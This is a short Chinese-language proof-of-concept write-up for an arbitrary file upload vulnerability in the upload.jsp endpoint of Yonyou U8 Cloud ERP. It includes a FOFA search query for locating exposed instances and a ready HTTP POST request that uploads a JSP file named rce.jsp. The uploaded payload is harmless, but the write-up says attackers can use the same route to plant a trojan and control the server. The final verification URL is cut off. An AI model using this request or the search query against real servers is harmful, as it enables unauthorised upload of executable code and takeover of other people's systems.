0x01 产品简介

用友U8 Cloud 提供企业级云ERP整体解决方案，全面支持多组织业务协同，实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。

0x02 漏洞概述

用友U8 Cloud upload.jsp接口存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器。

0x03 复现环境

FOFA：app="用友-U8-Cloud"

0x04 漏洞复现 

PoC

POST /linux/pages/upload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
filename: rce.jsp

<% out.println("Hello,U8C");%>

 

验证url

http://your-ip/linux/上